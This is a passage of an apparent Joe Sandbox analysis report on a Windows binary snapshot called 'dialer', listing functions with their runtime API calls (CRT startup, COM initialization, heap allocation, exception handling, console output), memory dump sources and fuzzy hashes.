Opcode Fuzzy Hash: 244091c49ed68055c0692faef3a2525c7c3348f3c51319ed44420de56821d5e1
Instruction Fuzzy Hash: 58512566B04A41CAE7009F76E4902AD37B4FB88B8DF018536DE4D97B28DE79D1488760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF7416D0 Relevance: 6.1, APIs: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF6CF7416DF

Part of subcall function 00007FF6CF741CD0: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6CF741CF2

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6CF7416F4
__scrt_release_startup_lock.LIBCMT ref: 00007FF6CF741762
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6CF7417B5

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: 1d47c023274f166a100536e72bda78cf94c01311b70bfa387798434ace5764f9
Instruction ID: f0b7ff821f5d626e57bfd2c161d01b21f0264db6aebac8fa262c971289c9897d
Opcode Fuzzy Hash: 1d47c023274f166a100536e72bda78cf94c01311b70bfa387798434ace5764f9
Instruction Fuzzy Hash: 0E314D2DE0824382FA16BF67B5113B91B81AF45786F464034E9CDC72D7DEACA815AE34

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF7413E0 Relevance: 4.6, APIs: 3, Instructions: 54
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(?,?,?,?,?,?,?,?,00000000,00007FF6CF7411C2), ref: 00007FF6CF741400
CoCreateInstance.OLE32(?,?,?,?,?,?,?,?,00000000,00007FF6CF7411C2), ref: 00007FF6CF74143A
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,00000000,00007FF6CF7411C2), ref: 00007FF6CF74148D

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID:
API String ID: 948891078-0
Opcode ID: b3b34c7c56bf64f65a937e24c9b500350a2efd844c6644b3dd326fef6fc55b5b
Instruction ID: 07f6ffa86207cb9d396e86207a88c5d23060248fddd47ccbeb4c64c264b7ae27
Opcode Fuzzy Hash: b3b34c7c56bf64f65a937e24c9b500350a2efd844c6644b3dd326fef6fc55b5b
Instruction Fuzzy Hash: 42211236728B4182E700DF66F49456A77A4FB84F85B415036EACE83B64DF3DD449CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF744660 Relevance: 4.5, APIs: 3, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6CF74465F), ref: 00007FF6CF744689
TerminateProcess.KERNEL32(?,?,?,00007FF6CF74465F), ref: 00007FF6CF744694
ExitProcess.KERNEL32 ref: 00007FF6CF7446A3

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 669619112c5019565bf18e4f150357e6436cce8b2033e5ea1e03104f6926e2e3
Instruction ID: c888118c6deb11445bf637815f7da9741af4d1f9be9193c9567835d4fba87336
Opcode Fuzzy Hash: 669619112c5019565bf18e4f150357e6436cce8b2033e5ea1e03104f6926e2e3
Instruction Fuzzy Hash: 4AE01A28B0460286EA146F62BD953792B52AF85702F005438CC8A873A2CE3DA45A8A31

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF7415EC Relevance: 3.1, APIs: 2, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_set_fmode.LIBCMT ref: 00007FF6CF741603
_RTC_Initialize.LIBCMT ref: 00007FF6CF741624

Part of subcall function 00007FF6CF743FD0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CF744002

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: Initialize_invalid_parameter_noinfo_set_fmode
String ID:
API String ID: 3548387204-0
Opcode ID: 0d3549a1f76ee38605a4ed8efc7ac0d1fbcb2521229da97c7a403b89933f075f
Instruction ID: bd75dc51a440d4945a0501e0d082efdc58aa0830067b9b84a52c369c0faa477f
Opcode Fuzzy Hash: 0d3549a1f76ee38605a4ed8efc7ac0d1fbcb2521229da97c7a403b89933f075f
Instruction Fuzzy Hash: D7119D1CE1A10346FB567FB374161B80B864F92342F560834E98DC65C3EE9CB452AE32

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF7445A4 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6CF7445C3

Part of subcall function 00007FF6CF7446AC: GetModuleHandleExW.KERNEL32 ref: 00007FF6CF7446C8
Part of subcall function 00007FF6CF7446AC: GetProcAddress.KERNEL32 ref: 00007FF6CF7446DE
Part of subcall function 00007FF6CF7446AC: FreeLibrary.KERNEL32 ref: 00007FF6CF7446FB

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 78e43872b68b8dbac860dede88264aaecdcf5960a39d659ba994bcdfed05a1a5
Instruction ID: 38f54b10b70e660c6e5d8fe989ab244f736f8fdcb6368f0804a7dc71d500e557
Opcode Fuzzy Hash: 78e43872b68b8dbac860dede88264aaecdcf5960a39d659ba994bcdfed05a1a5
Instruction Fuzzy Hash: 77218036E04B01C9EB10CFA5E4442EC3BA5EB44709F448536DA8D82A85DF38D495DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF747C00 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CF747C2B

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3de6ce496acb36e6b9192d36113ebc5fab5490050187772c9f6827926eddb6d2
Instruction ID: a46cf2a6d62eb238a9f58fdb652b056120f5033d02b016d3c3e5e565232a92d9
Opcode Fuzzy Hash: 3de6ce496acb36e6b9192d36113ebc5fab5490050187772c9f6827926eddb6d2
Instruction Fuzzy Hash: 43116A7A90964282E3109F16B44063ABBA9EB84742F850534E6DDC76A2DF3CE8128F30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF746098 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF6CF74A205,?,?,00000000,00007FF6CF748993,?,?,?,00007FF6CF744A5B,?,?,?,00007FF6CF744951), ref: 00007FF6CF7460D6

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 54a93b008d899c41e26389663d9c44a7e1230b7ebe08c3f925f30a82f2c02095
Instruction ID: 24558bed75eec9af96e960c0b3039fb18a5e6f12affbc0277abfcd0de86ec35c
Opcode Fuzzy Hash: 54a93b008d899c41e26389663d9c44a7e1230b7ebe08c3f925f30a82f2c02095
Instruction Fuzzy Hash: AEF0821CF0D24745FE581FA3BD107755BA05F447A2F084630DDAEC62D1DE6CE4408A30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF7415A0 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CF7415D8

Part of subcall function 00007FF6CF741C40: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6CF741C49

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
String ID:
API String ID: 680105476-0
Opcode ID: f4188ef05dc9878f1adc9d9d87058261c0c2c3b2c6959e91ae34b908a6157c66
Instruction ID: bb989765982717a3dc94e612d2de65e79d1c4e3f99e7b9d50c4a5deb467eb4f7
Opcode Fuzzy Hash: f4188ef05dc9878f1adc9d9d87058261c0c2c3b2c6959e91ae34b908a6157c66
Instruction Fuzzy Hash: B7E0BF48E5D10706F95A7F6335151F54B400F55373E291B30E9FF945D2AD9CA451A930

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF7460F8 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,00007FF6CF745487,?,?,?,00007FF6CF7439C5), ref: 00007FF6CF74614D

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: df486cd1c07f0e08bdae606a1fba06414fdbcc93516514daae39cc5709be01d8
Instruction ID: 4290ffdc028d077d0740d6f06adce8634cc5246014d5f3339e7f45066495faa3
Opcode Fuzzy Hash: df486cd1c07f0e08bdae606a1fba06414fdbcc93516514daae39cc5709be01d8
Instruction Fuzzy Hash: 7FE0128CB0A64641FD585FA779613B08B686F59B82F484839CC8EC6393EE1CA4108E30

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF6CF74200C Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6CF742028
RtlCaptureContext.KERNEL32 ref: 00007FF6CF742055
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6CF74206F
RtlVirtualUnwind.KERNEL32 ref: 00007FF6CF7420B0
IsDebuggerPresent.KERNEL32 ref: 00007FF6CF742104
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6CF742125
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6CF742130

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 5c73c7cfd2c88c49d2ecd95d7f9525be0f656850c236debd2a732b42481fbb0d
Instruction ID: cbea23c3c55516e916ab47d3599a824d6420efadbbcd66887663b771cc35fcf7
Opcode Fuzzy Hash: 5c73c7cfd2c88c49d2ecd95d7f9525be0f656850c236debd2a732b42481fbb0d
Instruction Fuzzy Hash: E9317076608B8186EB608F61F8803ED7764FB84745F44403ADB8E87B95EF38C148CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF74565C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6CF7456D5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6CF7456ED
RtlVirtualUnwind.KERNEL32 ref: 00007FF6CF745728
IsDebuggerPresent.KERNEL32 ref: 00007FF6CF745761
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6CF74576B
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6CF745776

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 2d9ffb2e283d954e094308ae022adb60edafcf653cdf8a76bef3f3732b37f72e
Instruction ID: 6faf46b935c57cc3ec945c5531f0df4d99a4046cdd4570b96f8461aaaacfc0cb
Opcode Fuzzy Hash: 2d9ffb2e283d954e094308ae022adb60edafcf653cdf8a76bef3f3732b37f72e
Instruction Fuzzy Hash: CC315E3A618B8186EB60CF26F8403AE77A4FB88755F500136EADD83B65DF38C155CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF74A384 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6CF74A3F3
WriteFile.KERNEL32 ref: 00007FF6CF74A6AA
WriteFile.KERNEL32 ref: 00007FF6CF74A6FC
GetLastError.KERNEL32 ref: 00007FF6CF74A7FE
GetLastError.KERNEL32 ref: 00007FF6CF74A85E

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: a4b691d91cda5e4a2f3f95a308932dfc3d8f54ea8258e2a2264cd968addef744
Instruction ID: e539f0bf05869b5c633f03bed3dcfe0e68cde7a57fa19956b9f700a85c6147c4
Opcode Fuzzy Hash: a4b691d91cda5e4a2f3f95a308932dfc3d8f54ea8258e2a2264cd968addef744
Instruction Fuzzy Hash: DCE1267AB086818AFB15CF66E0401ED7B71FB45789F108135DE8EA7B98DE38D516CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF742F14 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6CF7431C6,?,?,?,00007FF6CF742EB8,?,?,00000001,00007FF6CF742819), ref: 00007FF6CF742F99
GetLastError.KERNEL32(?,?,?,00007FF6CF7431C6,?,?,?,00007FF6CF742EB8,?,?,00000001,00007FF6CF742819), ref: 00007FF6CF742FA7
LoadLibraryExW.KERNEL32(?,?,?,00007FF6CF7431C6,?,?,?,00007FF6CF742EB8,?,?,00000001,00007FF6CF742819), ref: 00007FF6CF742FD1
FreeLibrary.KERNEL32(?,?,?,00007FF6CF7431C6,?,?,?,00007FF6CF742EB8,?,?,00000001,00007FF6CF742819), ref: 00007FF6CF743017
GetProcAddress.KERNEL32(?,?,?,00007FF6CF7431C6,?,?,?,00007FF6CF742EB8,?,?,00000001,00007FF6CF742819), ref: 00007FF6CF743023

Strings

api-ms-, xrefs: 00007FF6CF742FB9

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: ab7032d137cf0f683aa237aff0620a8eef84307570790a5ef77e410232a4acf4
Instruction ID: 6c3c23b48b398478c9d82fa3cbbfa133fe178e32ed20d9d57ab7b581c42fa9d9
Opcode Fuzzy Hash: ab7032d137cf0f683aa237aff0620a8eef84307570790a5ef77e410232a4acf4
Instruction Fuzzy Hash: A931283AB1A64292FE619F03B4005B52B94BF04BA5F594631DE9D87790EF3CE141CB30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF74BCFC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6CF74BD2D
GetLastError.KERNEL32 ref: 00007FF6CF74BD39
CloseHandle.KERNEL32 ref: 00007FF6CF74BD51
CreateFileW.KERNEL32 ref: 00007FF6CF74BD7C
WriteConsoleW.KERNEL32 ref: 00007FF6CF74BD9B

Strings

CONOUT$, xrefs: 00007FF6CF74BD5D

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3cda17559c69bd3c622d8ac656eb62d06e8622811e35a2fd4fe5ec72e54df046
Instruction ID: 44b13b075a732babf37ddf0a4c96cb3bc16902485fc38471beb40af0fe71cb19
Opcode Fuzzy Hash: 3cda17559c69bd3c622d8ac656eb62d06e8622811e35a2fd4fe5ec72e54df046
Instruction Fuzzy Hash: 64118E25B18A4286E7508F47F85432977A0FB88BE6F500234EE9DC77A4DF7CD8458B60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF7424C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6CF7424EB
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6CF742580
RtlUnwindEx.KERNEL32 ref: 00007FF6CF7425CF

Strings

csm, xrefs: 00007FF6CF742566
f, xrefs: 00007FF6CF7424FE

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: b976092298bae58da3851703ec6d482710abe8e6f4c2644931f6af6604204adc
Instruction ID: e92c554cbc7c8974ff498595df17a6da6ec9f9c7ab520fb3a88d4619e91d0377
Opcode Fuzzy Hash: b976092298bae58da3851703ec6d482710abe8e6f4c2644931f6af6604204adc
Instruction Fuzzy Hash: CF51B43AB1960287DB14CF16F404A297B95FB44B89F118530DEAE87B48DF78E851CB30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF7446AC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6CF7446C8
GetProcAddress.KERNEL32 ref: 00007FF6CF7446DE
FreeLibrary.KERNEL32 ref: 00007FF6CF7446FB

Strings

CorExitProcess, xrefs: 00007FF6CF7446D7
mscoree.dll, xrefs: 00007FF6CF7446BF

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: aac5ef1ae635c89971674e0ecb1802e12360d09a68dedea4de375549629e556d
Instruction ID: ea1409223e330a5e3e17ea1d1b0d7bf9355ca4e6b28e53721e2bac556ff14c8b
Opcode Fuzzy Hash: aac5ef1ae635c89971674e0ecb1802e12360d09a68dedea4de375549629e556d
Instruction Fuzzy Hash: 4AF05E69B2964282EF548F16F9943B82B60AF88793F441435E9CFC6560CE2CD498CF30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF74ACEC Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CF74AD2E
GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00007FF6CF74ACAB,00000000,?,?,00007FF6CF748FDB), ref: 00007FF6CF74ADEC
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00007FF6CF74ACAB,00000000,?,?,00007FF6CF748FDB), ref: 00007FF6CF74AE76

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 7199769337038aa9dfe3952619510ff5a966c89cfadd2e717af2841d6a4a028f
Instruction ID: 2fdbb025fc43dd061c5008e15de641aa24831be3b9827a606a5ff4ca805a67cf
Opcode Fuzzy Hash: 7199769337038aa9dfe3952619510ff5a966c89cfadd2e717af2841d6a4a028f
Instruction Fuzzy Hash: E681C36AE1861295FB149F66A8406BD2FA0FB44796F840135DE8EE3795DF3CE441CB30

Uniqueness

